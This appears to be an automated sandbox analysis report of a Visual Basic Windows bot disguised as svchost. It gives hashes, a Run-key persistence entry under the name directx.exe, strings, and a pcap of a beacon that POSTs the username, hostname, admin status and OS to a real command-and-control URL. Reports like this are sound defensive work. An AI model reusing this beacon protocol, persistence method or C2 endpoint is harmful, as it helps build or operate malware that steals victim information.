Analysis Date: 2014-10-02 01:54:37
MD5: 0b91fb5e72640c855097992ebce97b93
SHA1: 6389246634889c316ce78d5b1ab904bba045746b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 3dd6cda1e9a37910669a8ebb912ac360 sha1: 185ba9d4f83021de641ea2aad0c1c17b116bd168 size: 24576
Section .data: md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section .rsrc: md5: 0675211fa4b821e68dc6c6027df1aae7 sha1: 972ebf5ad81617b7a4bf3385bf6d8200555b479f size: 4096
Timestamp: 2011-09-15 14:11:18
Version:
InternalName: make
FileVersion: 1.00
CompanyName: Microsoft
ProductName: svchost
ProductVersion: 1.00
OriginalFilename: make.exe
Packer: Microsoft Visual Basic v5.0
PEhash: d70f3df33f7cfc1b8e0673e178e3c99630b67639
IMPhash: 66f019a26687f34e574e51b9b06e5e00

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\directx ➝
C:\Documents and Settings\Administrator\Application Data\directx.exe
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Application Data\directx.exe
Creates Mutex: LOLEXE
Winsock DNS: petke.pl

Network Details:

DNS: petke.pl
Type: A
87.98.239.19
HTTP POST: http://petke.pl/own/run.php
User-Agent: 753cda8b05e32ef3b82e0ff947a4a936
Flows TCP: 192.168.1.1:1031 ➝ 87.98.239.19:80

Raw Pcap
0x00000000 (00000)   504f5354 202f6f77 6e2f7275 6e2e7068   POST /own/run.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 55736572   p HTTP/1.1..User
0x00000020 (00032)   2d416765 6e743a20 37353363 64613862   -Agent: 753cda8b
0x00000030 (00048)   30356533 32656633 62383265 30666639   05e32ef3b82e0ff9
0x00000040 (00064)   34376134 61393336 0d0a436f 6e74656e   47a4a936..Conten
0x00000050 (00080)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x00000060 (00096)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x00000070 (00112)   726c656e 636f6465 640d0a41 63636570   rlencoded..Accep
0x00000080 (00128)   742d4c61 6e677561 67653a20 656e2d75   t-Language: en-u
0x00000090 (00144)   730d0a43 6f6e7465 6e742d4c 656e6774   s..Content-Lengt
0x000000a0 (00160)   683a2037 340d0a41 63636570 743a202a   h: 74..Accept: *
0x000000b0 (00176)   2f2a0d0a 486f7374 3a207065 746b652e   /*..Host: petke.
0x000000c0 (00192)   706c0d0a 436f6e6e 65637469 6f6e3a20   pl..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a7573   Keep-Alive....us
0x000000e0 (00224)   6572616e 6470633d 41646d69 6e697374   erandpc=Administ
0x000000f0 (00240)   7261746f 7240434f 4d505554 45522d58   rator@COMPUTER-X
0x00000100 (00256)   58585858 58266164 6d696e3d 54727565   XXXXX&admin=True
0x00000110 (00272)   266f733d 4d696372 6f736f66 74205769   &os=Microsoft Wi
0x00000120 (00288)   6e646f77 73205850                     ndows XP


Strings
040904B0
1.00
753cda8b05e32ef3b82e0ff947a4a936
@*\AC:\Documents and Settings\ADMIN\Pulpit\uBot Sauce\Hidden\Project1.vbp
&admin=
AppData
application/x-www-form-urlencoded
CompanyName
COMPUTERNAME
Content-Type
directx
\directx.exe
.exe
FileVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
http://
http://petke.pl/own/
&id=
InternalName
\Internet Explorer\iexplore.exe 
LOLEXE
make
make.exe
Microsoft
MSXML2.ServerXMLHTTP
Open
OriginalFilename
&os=
POST
ProductName
ProductVersion
programfiles
RegDelete
regread
ResponseText
run.php
Send
setRequestHeader
Software\Microsoft\Windows\CurrentVersion\Run
StringFileInfo
svchost
TEMP
Translation
Unknown
User-Agent
userandpc=
USERNAME
VarFileInfo
Vista
VS_VERSION_INFO
WScript.Shell
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32.dll
advpack.dll
_allmul
-C000-svc
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
C:\Program Files\Microsoft Visual Studio 2\VB98\VB6.OLB
CreateMutexA
`.data
DllFunctionCall
EVENT_SINK_AddRef
EVENT_SINK_QueryInterface
EVENT_SINK_Release
getCommand
GetModuleFileNameA
Gs$FIs
HstLIs|sJs
Is0jIs
IsbrKs
IsNTAdmin
jKs1hKs
jLhl)@
Js&HIs
JstjIs-
} jXh0
kernel32
Ks*aJs
KsEjIsZ]Hs
MSVBVM60.DLL
NTDLL.DLL
NtSetInformationProcess
RegCloseKey
RegCreateKeyA
RegSetValueExA
RtlAdjustPrivilege
SetFileAttributesA
shell32.dll
ShellExecuteA
svchost
!This program cannot be run in DOS mode.
Timer1
URLDownloadToFileA
urlmon
VBA6.DLL
__vbaBoolVarNull
__vbaChkstk
__vbaEnd
__vbaExceptHandler
__vbaExitProc
__vbaFPException
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaHresultCheckObj
__vbaI2I4
__vbaI4Var
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLenBstr
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaR8IntI2
__vbaResume
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrI2
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarMove
__vbaStrVarVal
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpGt
__vbaVarCopy
__vbaVarDup
__vbaVarIndexLoad
__vbaVarLateMemCallLd
__vbaVarMove
__vbaVarNot
__vbaVarSetVar
__vbaVarTstEq